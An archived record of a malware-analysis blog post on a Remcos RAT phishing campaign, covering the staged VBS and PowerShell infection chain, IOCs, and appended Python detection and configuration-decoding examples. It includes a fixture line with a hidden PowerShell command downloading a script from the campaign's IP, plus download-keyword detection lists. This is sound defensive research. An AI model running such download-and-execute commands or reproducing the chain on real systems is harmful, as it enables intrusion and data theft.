{
	"id": "ec20f63d-c2f7-4f13-9b72-f1ce0b9c3385",
	"created_at": "2026-04-06T00:20:16.64678Z",
	"updated_at": "2026-04-10T03:20:50.417633Z",
	"deleted_at": null,
	"sha1_hash": "db73251882f0c02542f5b6fa33851547721a8e9e",
	"title": "New Wave of Remcos RAT Phishing Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1323869,
	"plain_text": "New Wave of Remcos RAT Phishing Campaign\r\nBy Hido Cohen\r\nArchived: 2026-04-05 16:21:25 UTC\r\nMorphisec Labs has detected a new wave of Remcos trojan infection. The theme of the phishing emails is again\r\nfinancial, this time as payment remittances sent from financial institutions. The attacker lures a user to open a\r\nmalicious Excel file that contains “confidential information” which starts the infection chain.\r\nMorphisec’s analysis has identified several services used for these phishing campaigns. They include Wells Fargo,\r\nFIS Global, and ACH Payment notifications. For example:\r\nFigure 1: Email from Wells Fargo’s CEO with a malicious attachment\r\nThis infection contains many stages and largely depends on the C2 server, which stores the required files for each\r\nstage.\r\nhttps://blog.morphisec.com/remcos-trojan-analyzing-attack-chain\r\nPage 1 of 12\n\nFigure 2: All stages stored in the C2.\r\nThe attacker also uses a password-protected .xls file to lower the detection rate. The password is in the phishing\r\nemail, and as we can see—password protection helps:\r\nFigure 3: The malicious attachment and first stage detection rate\r\nIn this blog post, we analyze the full attack chain used by the attacker and explain how each step works.\r\nWhat is the Remcos Trojan?\r\nRemcos is a commercial remote access trojan (RAT) developed by BreakingSecurity. Remcos has many\r\ncapabilities, and a free version downloadable directly from BreakingSecurity’s website. Morphisec has previously\r\ncovered Remcos as the payload in Guloader, and the payload in the Babadeda crypter.\r\nThe Remcos trojan allows attackers to quickly and easily control an infected computer, steal personal information,\r\nand surveil a victim’s activity. 
All this without investing time in developing a tool with remote administration capabilities.\r\nThe Infection Chain\r\nFigure 4: Infection chain steps\r\nThe .xls file writes and executes a new .vbs file. The code inside that file executes a PowerShell command that downloads another .vbs file from a remote server. Once downloaded and saved to disk, PowerShell executes the file. Next, the newly downloaded .vbs file connects to the C2 server again and fetches an encoded PowerShell command. This PowerShell code is responsible for downloading the next stage and decoding it. That stage contains a .NET injector and the final payload. After decoding, the PowerShell code loads the injector, which injects the final payload, the Remcos RAT, into a target process.\r\nTechnical Analysis\r\nAnalyzed Sample\r\n.xls: 8740cdcef9e825fd5105b021e0616a1d6a41f761c92f29127cd000c8500f70e6\r\nFirst Stage: .xls\r\nSteps 2-3 in Figure 4\r\nFigure 5: The malicious .xls file\r\nThe .xls file contains Visual Basic (VBA) code that executes once a user opens the file and enables macros. Looking inside the file reveals the logic behind the script.\r\nFigure 6: Main VB function\r\nFirst, the macro stores the PowerShell command in the variable F, a FileSystemObject CLSID in F2, and a second CLSID (Shell.Application) in F3. Next it creates a new file inside %AppData% using the object instantiated from the CLSID in F2. Finally, it writes F to that file and calls the function that executes it. 
It does so by creating a Shell.Application object from the second CLSID and running the newly created QAITB.vbs file.\r\nSecond Stage: .vbs Executes PowerShell Downloader\r\nSteps 3-5 in Figure 4\r\nInside QAITB.vbs is a reversed PowerShell command which downloads the next stage and saves it to disk.\r\nFigure 7: .vbs downloader\r\nThe malware uses the Shell.Application CLSID again to execute the PowerShell command. The PowerShell command downloads the file (209.127.19[.]101/win.vbs in this case), saves it as %Temp%\\harvest.vbs, and deletes the previous file at %AppData%\\QAITB.vbs. (See the IOCs section for more.)\r\nThird Stage: Another .vbs Downloader\r\nSteps 6-7 in Figure 4\r\nThe malware continues to communicate with its C2 server, requesting more files. This time the file request is made by harvest.vbs. This .vbs file is responsible for two things:\r\n1. Setting persistence by copying the script file to the Startup folder.\r\nFigure 8: Set persistence by copying the script to the Startup folder\r\n2. Downloading the next stage from the C2 server.\r\nFigure 9: Download and execute the next stage\r\nThe malware uses the InternetExplorer COM object to create a hidden IE window that navigates to a URL. 
It then extracts the command located in the returned document's InnerText.\r\nThe next stage is executed using the same Shell.Application CLSID as before:\r\nFigure 10: PowerShell execution from .vbs\r\nWhich translates to:\r\nGetObject(“new:13709620-C279-11CE-A49E-444553540000”).ShellExecute powershell \u003ccommand\u003e\r\nFourth Stage: Encoded PowerShell\r\nSteps 8-9 in Figure 4\r\nThe downloaded PowerShell command is another encoded command that translates to:\r\nFigure 11: Decoded PowerShell command\r\nWhere g is an alias for IEX.\r\nThis command checks whether the machine has an internet connection by pinging google.com. If so, it contacts the C2 server again. The next stage is another PowerShell command executed using IEX.\r\nFifth Stage: PowerShell Unzips Injector and Final Payload\r\nSteps 10-11 in Figure 4\r\nThis stage carries two large GZip-compressed blobs and decompresses them. The first blob is a .NET injector. The second is the final payload, which is injected into the target process.\r\nThe important commands in this stage are:\r\nFigure 12: Final payload injector execution\r\nThe malware loads the decompressed data located inside $JtpgNId. This is the injector. Once the injector is loaded into memory, the malware calls a toooyou.Black function that injects the payload into RegAsm.exe.\r\nFinal Payload\r\nAt this point we get the final payload, a Remcos RAT.\r\nFigure 13: Remcos RAT agent initialized message\r\nIn this case the configuration of the Remcos trojan is stored as a resource named SETTINGS. It is RC4 encrypted. We can extract the configuration by decrypting it using the following steps:\r\n1. Read the first byte in the resource—this is the key length.\r\n2. Read the next \u003ckey_length\u003e bytes—this is the key.\r\n3. Read the rest of the data—this is the encrypted section.\r\n4. 
RC4 decrypt the encrypted section using the key.\r\nAfter extracting the configuration, we can find where the stolen data is sent:\r\nFigure 14: Remcos decrypted configuration\r\nThis sample communicates with freshdirect.dvrlists[.]com:119.\r\nHow Do You Stop a Remcos Trojan?\r\nA Remcos RAT is just the final component of a lengthy and sophisticated attack chain delivery process. Such attacks use advanced defense evasion techniques to sneak past cybersecurity solutions. These techniques include disabling or uninstalling security tools, and obfuscating or encrypting data and scripts. According to the latest Picus report, defense evasion is now the most popular tactic among malware operators.\r\nMorphisec’s patented Moving Target Defense is the best on the market for preventing defense evasion techniques. Unlike other cybersecurity solutions which focus on detecting known patterns with response playbooks, Morphisec MTD preemptively blocks attacks on memory and applications and eliminates the need for a response.\r\nTo find out more about Morphisec’s revolutionary Moving Target Defense technology, read the white paper: Zero Trust + Moving Target Defense: Stopping Ransomware, Zero-Day, and Other Advanced Threats Where NGAV and EDR Are Failing.\r\nIndicators of Compromise (IOCs)\r\nEmails\r\nc221b6eb8437d1f43ebffae9e51c7d330016290d048cfff2f402a7508b1e16e3\r\n8740cdcef9e825fd5105b021e0616a1d6a41f761c92f29127cd000c8500f70e6\r\n6d9d1de4f4ea0e4aeb553458f4cea2af1a2554fe84c952b367ed5eb753990fc7\r\n342bad5211bf3c8af50e263334bb90b580d71220e6b16597ba7bdd6f404e4215\r\nb5833f95871ced64f48649b55e075e85c1c595f4af8522082c8e3ef72917ae80\r\na2cffc70c2b63baa3ada0b916b778996204bd3b7a91eab66757b4343888eec3f\r\n1a5b5299afb0c657e2141aaf46600c6ca91ca80840d65fb3b5afb53a99069e53\r\n
XLSs\r\n6ad5d2aae0cb58f943f39d8b43492fd6007cd8caeeaaea03013194572756b124\r\n85c4808b3ed64480ae0d9f5c6fdaade6c7298f89cb4b799f0d5510b674d0a367\r\ndc88c4ddc7f428a266cf619d4d5367fa10a86c2c7fc18a359eb8d9d264437111\r\n26bd031cb4a5333bbd77698f5aaf737cb108b4b9d30670d92218a8c31ec0abc7\r\n5115b590c285b437f5d432b1ca0ad8ee8ba89afedd7a5228d8d79e20e6ec84d8\r\n77268e599a7bee74da06206f33c4725e262627d88123c7920e6aab9d9473a1c0\r\n.vbs\r\ne0306366dd9c04bc92421d855a116d145e4b9afe4852bc77a02089d363d031a4\r\n1e7dba5f19588eeceffb45e96f4673ce181d64392805c5a78e83ae8c15d42d61\r\na954043909b90d12ab1659e2d28adb236b4ac521084282448757f7b1fd8d8b05\r\n6f2e30793f43ea5b71f5609fa508acf595393d1a3e2ac2a9e8205228e0c50fe8\r\n128971c9ae22f36db1074ff2e93c2adb07c21eb3e5c139d501e06ef29bf28b97\r\n3f54c5f1cf53bb9a87aabdd0847c3506aebda16e5c384ab2d939264541e214e9\r\n70a1064fee27885c8d3caa5c18e0c08609c50ecdaa8e0ee2b9ce5c97a6df21f1\r\ne646ad0c447c477004947aa49154c9d1cf1013769332f76aa46bc230ae286d1c\r\nc04840608386221e34ec81c5e9875e6e77cbdbf3acd63e76e338a1ad5ccf8da5\r\n1cb0c04eefe74736dc16b418e01fa7d61753992bc4898fe3600f61d648e64e1c\r\nda546ce81e022979c8dc7942667e57aa605b11cae9eb20d917df63cad75d4ec3\r\nf3ef4e8e91f7558a6e86f4001e0fc78defeaafe0298263a8f3bd62a451e45c5e\r\nURLs\r\nhxxp://kingspalmhomes[.]com/wprl/Protected Client.vbs\r\nhxxp://kingspalmhomes[.]com/admin/Protected Client.vbs\r\nhxxp://kingspalmhomes[.]com/wprl/Protected.vbs\r\nhxxp://kingspalmhomes[.]com/product/Protected.vbs\r\nhxxp://fisintegrateds[.]com/zp-admin/Protected Client.vbs\r\nhxxp://gotovacoil[.]com/created/Protected Client.vbs\r\nhxxp://gotovacoil[.]com/newfolder/Protected Client.vbs\r\nhxxp://dreamwatchevent[.]com/wsalptza/Client.vbs\r\nhxxp://dreamwatchevent[.]com/zp-user/Protected 
Client.vbs\r\nhxxp://209.127.19[.]101/win.vbs\r\nhxxp://209.127.19[.]101/pit.txt\r\nhxxp://209.127.19[.]101/kif.jpg\r\nDomains\r\nfisintegrateds[.]com\r\nkingspalmhomes[.]com\r\ngotovacoil[.]com\r\ndreamwatchevent[.]com\r\n209.127.19[.]101\r\nFinal Payload (Remcos)\r\n79AD11D52EA3D0BD956CAD871396C8DA2C9A76FFFC02E694339B7FE8B6CE18EA\r\n401D142905E2253E7E38CC7E275A09A4A0F45AE73F15748EA69C1F6CB0591A81\r\nCFD29C1AC568E0A21B5F2C05B96BB5BBF2848E89BD6DBDDF4C69DAB3B1CD8A32\r\nRemcos C2s\r\nshiestynerd[.]dvrlists[.]com\r\nbreakingsecurity[.]dvrlists[.]com\r\nfreshdirect[.]dvrlists[.]com\r\nAbout the author\r\nHido Cohen\r\nSource: https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain"
	],
	"report_names": [
		"remcos-trojan-analyzing-attack-chain"
	],
	"threat_actors": [],
	"ts_created_at": 1775434816,
	"ts_updated_at": 1775791250,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/db73251882f0c02542f5b6fa33851547721a8e9e.pdf",
		"text": "https://archive.orkl.eu/db73251882f0c02542f5b6fa33851547721a8e9e.txt",
		"img": "https://archive.orkl.eu/db73251882f0c02542f5b6fa33851547721a8e9e.jpg"
	}
}
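Added example, not code from the Morphisec post: a small Python detection pass over process and file events that encodes the parent/child relationships described under "The Infection Chain" (Excel running a .vbs dropped in %AppData%, wscript.exe launching a PowerShell downloader, the script copying itself to the Startup folder, and PowerShell starting RegAsm.exe as its injection target). The events are constructed Sysmon-style records, not real telemetry; the command lines, user name and paths in them are illustrative. Two assumptions are marked in the code: that Shell.Application's ShellExecute on a .vbs surfaces as wscript.exe under EXCEL.EXE, and that RegAsm.exe is started as a child of the PowerShell process. The injection-target rule also lists RegSvcs.exe and InstallUtil.exe, which the post does not mention but which are abused in the same way.

```python
import re

# Constructed Sysmon-style events (not real telemetry). Events 0-3 mirror the
# chain in the post; events 4-5 are benign controls that must not fire.
EVENTS = [
    {"type": "process",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Roaming\QAITB.vbs"'},
    {"type": "process",
     "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://209.127.19.101/win.vbs', $env:TEMP + '\harvest.vbs')"},
    {"type": "file",
     "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harvest.vbs"},
    {"type": "process",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"},
    {"type": "process",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "cmdline": r'"msedge.exe" https://example.com/report'},
    {"type": "process",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process | Sort-Object CPU"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# RegAsm.exe is the target named in the post; RegSvcs.exe and InstallUtil.exe
# are sibling .NET utilities abused the same way (generalization, not from the post).
INJECTION_TARGETS = {"regasm.exe", "regsvcs.exe", "installutil.exe"}
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest",
                    "net.webclient", "start-bitstransfer", "invoke-restmethod")


def base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def office_spawns_script_host(e):
    # Stage 1 -> 2. Assumption: ShellExecute on the dropped .vbs appears as
    # wscript.exe/cscript.exe with the Office process as parent.
    return (e["type"] == "process" and base(e["parent"]) in OFFICE_APPS
            and base(e["image"]) in SCRIPT_HOSTS
            and re.search(r"\\appdata\\.*\.vbs", e["cmdline"], re.I) is not None)


def script_host_spawns_downloader(e):
    # Stage 2 -> 3: the .vbs launches PowerShell that fetches the next stage.
    cmd = e.get("cmdline", "").lower()
    return (e["type"] == "process" and base(e["parent"]) in SCRIPT_HOSTS
            and base(e["image"]) == "powershell.exe"
            and any(marker in cmd for marker in DOWNLOAD_MARKERS))


def script_dropped_in_startup(e):
    # Stage 3: harvest.vbs copies itself into the Startup folder for persistence.
    target = e.get("target", "").lower()
    return (e["type"] == "file" and "\\start menu\\programs\\startup\\" in target
            and target.endswith((".vbs", ".vbe", ".js", ".jse", ".wsf")))


def powershell_spawns_injection_target(e):
    # Stage 5. Assumption: the in-memory .NET injector starts RegAsm.exe as a
    # child of the PowerShell process before injecting the payload into it.
    return (e["type"] == "process" and base(e["parent"]) == "powershell.exe"
            and base(e["image"]) in INJECTION_TARGETS)


RULES = [office_spawns_script_host, script_host_spawns_downloader,
         script_dropped_in_startup, powershell_spawns_injection_target]


def detect(events):
    """Return (event index, rule name) for every rule that matches an event."""
    return [(i, rule.__name__) for i, e in enumerate(events) for rule in RULES if rule(e)]


def chain_coverage(events):
    """Number of distinct stages observed; three or more on one host is worth
    an alert even where a single rule would be too noisy on its own."""
    return len({name for _, name in detect(events)})


if __name__ == "__main__":
    for idx, name in detect(EVENTS):
        print(idx, name)
    print("stages matched:", chain_coverage(EVENTS))
```

Run as a script to list which rule fired on which event. Each rule alone has false positives (PowerShell starting RegAsm.exe is routine on a build host), so the useful signal is chain_coverage: the post's stages land on one machine in sequence, and several of them together is far stronger evidence than any one.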
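Added example, not code from the post: a decoder for the SETTINGS resource layout given in the four steps under "Final Payload" (one length byte, then the RC4 key, then the RC4-encrypted configuration). RC4 is written out so the script runs offline with no dependencies. The real resource bytes are not reproduced; SAMPLE_BLOB is constructed here by encrypting a fake configuration string under a fake key, and the only value borrowed from the post is the C2 host:port. Carving the SETTINGS resource out of the unpacked PE (for example from the resource directory with pefile) is outside the example, as is the real Remcos field separator; the host:port pattern in extract_c2 is an assumption based on Figure 14.

```python
import re


def rc4(key, data):
    """RC4 (KSA + PRGA). The cipher is a keystream XOR, so the same call
    encrypts and decrypts."""
    if not key:
        raise ValueError("empty RC4 key")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_settings(blob):
    """Split a SETTINGS resource into (key, ciphertext) following the layout
    in the post: byte 0 is the key length, the next key_length bytes are the
    RC4 key, and everything after that is the encrypted configuration."""
    if len(blob) < 3:
        raise ValueError("SETTINGS resource too short")
    key_len = blob[0]
    if key_len == 0 or len(blob) <= 1 + key_len:
        raise ValueError(
            "key length %d is inconsistent with resource size %d" % (key_len, len(blob)))
    return blob[1:1 + key_len], blob[1 + key_len:]


def decrypt_settings(blob):
    """Return the plaintext configuration carried by a SETTINGS resource."""
    key, ciphertext = parse_settings(blob)
    return rc4(key, ciphertext)


def build_settings(key, config):
    """Inverse of parse_settings; used only to build the constructed sample."""
    if not 0 < len(key) < 256:
        raise ValueError("key length must fit in one byte")
    return bytes([len(key)]) + key + rc4(key, config)


# Assumption (based on Figure 14): the C2 appears in the decrypted config as
# host:port text, so a simple pattern pulls it out.
C2_RE = re.compile(rb"([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+|\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})")


def extract_c2(config):
    """Return every host:port token found in a decrypted configuration."""
    return ["%s:%s" % (host.decode(), port.decode()) for host, port in C2_RE.findall(config)]


# Constructed sample (not the real resource): a fake configuration string
# encrypted under a fake key. The only value taken from the post is the C2.
SAMPLE_KEY = b"constructed-demo-key"
SAMPLE_CONFIG = b"freshdirect.dvrlists.com:119:1|Remcos-Demo|1|300|SETTINGS-DEMO"
SAMPLE_BLOB = build_settings(SAMPLE_KEY, SAMPLE_CONFIG)


if __name__ == "__main__":
    config = decrypt_settings(SAMPLE_BLOB)
    print(config.decode(errors="replace"))
    print(extract_c2(config))
```

parse_settings rejects a blob whose length byte points past the end of the data, which is what a badly carved resource or a different Remcos build looks like; better to fail loudly there than to RC4-decrypt garbage and go hunting for a C2 in it. The standard RC4 test vector (key "Key", plaintext "Plaintext" gives ciphertext BBF316E8D940AF0AD3) is a quick sanity check for the cipher routine when adapting it.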